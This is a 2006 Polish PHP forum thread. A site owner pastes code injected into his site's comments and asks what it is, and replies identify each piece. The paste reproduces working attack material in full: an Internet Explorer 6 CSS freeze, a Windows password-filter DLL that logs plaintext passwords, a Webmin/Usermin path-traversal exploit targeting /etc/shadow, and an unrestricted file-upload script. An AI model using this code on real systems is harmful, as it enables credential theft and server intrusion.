Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> HACKERZY? HACK mojej strony !, HELP :(:(
mThW
post 24.07.2006, 22:28:06
Post #1





Grupa: Zarejestrowani
Postów: 18
Pomógł: 0
Dołączył: 19.07.2006

Ostrzeżenie: (0%)
-----


Witam exclamation.gif!

Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:

  1. <!-- 
  2. # Internet Explorer <= 6 DoS vulnerability 
  3. # tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng) 
  4. # all versions are vulnerable 
  5. # ie 7 (beta 2 and 3) are not affected 
  6. # this malicious css code freezes/ dos the internet explorer 
  7. # prior version 7 and stops any user interaction 
  8. # the absolute size of the div element does not matter but has 
  9. # to be higher than the input's one 
  10. # 07/14/2006 by jonasschaub at gmail.com 
  11. # <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a> 
  12. --> 
  13.  
  14. <style type="text/css"> 
  15.  
  16. input 
  17. width:35px; 
  18. float:left; 
  19.  
  20. </style> 
  21.  
  22. <div style="width:50px;"> 
  23. <span> 
  24. <span style="position:relative;"> 
  25. <input /> 
  26. </span> 
  27. <input /> 
  28. <input /> 
  29. </span> 
  30. </div>
  31.  
  32.  
  33. #include <windows.h> 
  34. #include <stdio.h> 
  35. #include <stdlib.h> 
  36.  
  37. struct UNI_STRING { 
  38. USHORT len; 
  39. USHORT maxlen; 
  40. WCHAR *buff; 
  41. }; 
  42.  
  43. static HANDLE fh; 
  44.  
  45. BOOLEAN __stdcall InitializeChangeNotify () 
  46. DWORD wrote; 
  47. fh = CreateFile("C:temppwdchange.out", 
  48. GENERIC_WRITE, 
  49. FILE_SHARE_READ|FILE_SHARE_WRITE, 
  50. 0, 
  51. CREATE_ALWAYS, 
  52. FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG 
  53. H, 
  54. 0); 
  55. WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0); 
  56. return TRUE; 
  57.  
  58. LONG __stdcall PasswordChangeNotify ( 
  59. struct UNI_STRING *user, 
  60. ULONG rid, 
  61. struct UNI_STRING *passwd 
  62. DWORD wrote; 
  63. WCHAR wbuf[200]; 
  64. char buf[512]; 
  65. char buf1[200]; 
  66. DWORD len; 
  67.  
  68. memcpy(wbuf, user->buff, user->len); 
  69. len = user->len/sizeof(WCHAR); 
  70. wbuf[len] = 0; 
  71. wcstombs(buf1, wbuf, 199); 
  72. sprintf(buf, "User = %s : ", buf1); 
  73. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  74.  
  75. memcpy(wbuf, passwd->buff, passwd->len); 
  76. len = passwd->len/sizeof(WCHAR); 
  77. wbuf[len] = 0; 
  78. wcstombs(buf1, wbuf, 199); 
  79. sprintf(buf, "Password = %s : ", buf1); 
  80. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  81.  
  82. sprintf(buf, "RID = %xn", rid); 
  83. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  84.  
  85. return 0L; 
  86. -----------------------end of 
  87. FPNWCLNT.c---------------------------------- 
  88. --
  89.  
  90.  
  91.  
  92. <?php 
  93. /* 
  94. Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability 
  95. Date : 2006-06-30 
  96. Patch : update to version 1.290 
  97. Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a> 
  98. Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a> 
  99. */ 
  100.  
  101. $host = $argv[1]; 
  102. $port = $argv[2]; 
  103. $http = $argv[3]; 
  104. $file = $argv[4]; 
  105. // CHECKING THE INPUT 
  106. if($host != "" && $port != "" && $http != "" && $file != "") { 
  107.  
  108.  
  109. $z = "/..%01"; 
  110. for ($i=0;$i<60;$i++) { 
  111. $z.="/..%01"; 
  112. } 
  113.  
  114. $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; 
  115.  
  116. echo "Attacking ".$host."n"; 
  117. echo "---------------------------------n"; 
  118.  
  119. // INITIALIZING CURL SESSION TO THE TARGET 
  120.  
  121. $ch = curl_init(); 
  122.  
  123. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
  124. curl_setopt($ch, CURLOPT_URL, $target); 
  125. curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); 
  126. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE 
  127. ); 
  128.  
  129. $content = curl_exec($ch); 
  130. curl_close ($ch); 
  131.  
  132. // CLOSING CURL 
  133.  
  134. // ECHOING THE CONTENT OF THE $FILE 
  135. echo $content; 
  136.  
  137. echo "---------------------------------n"; 
  138. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  139.  
  140. } else { 
  141. // IF INPUT IS NOT CORRECT DISPLAY THE README 
  142. echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILEn"; 
  143. echo "Example : php webmin.php localhost 10000 http /etc/shadown"; 
  144. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  145. } 
  146.  
  147. ?>
  148.  
  149.  
  150.  
  151. <?php 
  152. $file = $HTTP_POST_FILES["plik"]["tmp_name"]; 
  153. $zapisz_jako = $HTTP_POST_FILES["plik"]["name"]; 
  154.  
  155. if (!copy($file, $zapisz_jako)) { 
  156.  
  157. print ("Kopiowanie pliku nie powiodło się...<br>n"); 
  158.  
  159. } 
  160.  
  161. print "<BR>Nazwa pliku: ".$HTTP_POST_FILES["plik"]["name"]; 
  162.  
  163. print "<BR>Rozmiar pliku: ".$HTTP_POST_FILES["plik"]["size"]; 
  164.  
  165. print "<BR>tymczasowo: ".$HTTP_POST_FILES["plik"]["tmp_name"]; 
  166.  
  167. print "<BR>Typ przesłanego pliku: ".$HTTP_POST_FILES["plik"]["type"]; 
  168.  
  169. ?>



Moaj strona: http://www.miasto-glubczyce.info/index.php...t=&oms=news
Głowna: http://www.miasto-glubczyce.info/
http://www.miasto-glubczyce.info/?oms=ksiega_gosci
W ksiedze tez wpisano jakis kod, dlatego jest error.
HELP biggrin.gif

Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...


Dzieku z gory za analize.
Pozdrawiam
Go to the top of the page
+Quote Post
piczu
post 24.07.2006, 22:52:27
Post #2





Grupa: Zarejestrowani
Postów: 182
Pomógł: 0
Dołączył: 4.01.2005
Skąd: piczu.info

Ostrzeżenie: (10%)
X----


pierwszy to DoS na IE, drugi to trojan na wykrycie hasla z Windozy, trzeci to kod na dziure w Webminie i Userminie,a ostatni to przeslanie pliku na serwer. Chyba juz wiesz oco chodzi biggrin.gif

Ten post edytował piczu 24.07.2006, 22:53:00


--------------------
pozdrawiam :)
Go to the top of the page
+Quote Post
Cysiaczek
post 24.07.2006, 23:05:40
Post #3





Grupa: Moderatorzy
Postów: 4 465
Pomógł: 137
Dołączył: 26.03.2004
Skąd: Gorzów Wlkp.




Proponuję, żebyś zabezpieczył swoje formularze tak. aby nie mozna było jak powiadsz - wklejać kodu.
Btw. Proooszeee - tylko nie hackerzy - zwykłe script-kiddie/crackerzy (nie - nie zamierzam się spierac o nazwy smile.gif


--------------------
To think for yourself you must question authority and
learn how to put yourself in a state of vulnerable, open-mindedness;
chaotic, confused, vulnerability, to inform yourself.
Think for yourself. Question authority.
Go to the top of the page
+Quote Post
marek220
post 25.07.2006, 11:48:31
Post #4





Grupa: Zarejestrowani
Postów: 46
Pomógł: 0
Dołączył: 14.12.2003
Skąd: Gliwice

Ostrzeżenie: (10%)
X----


Proszę tylko nie crackerzy, to już się przyjeło dla reversowców, pozostawmy crackerów tak jak jest to obecnie rozpoznawane jako osoby piszące keygeny, patche itp, bo zaś dla nich nie będzie nazwy smile.gif
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 15.07.2025 - 01:51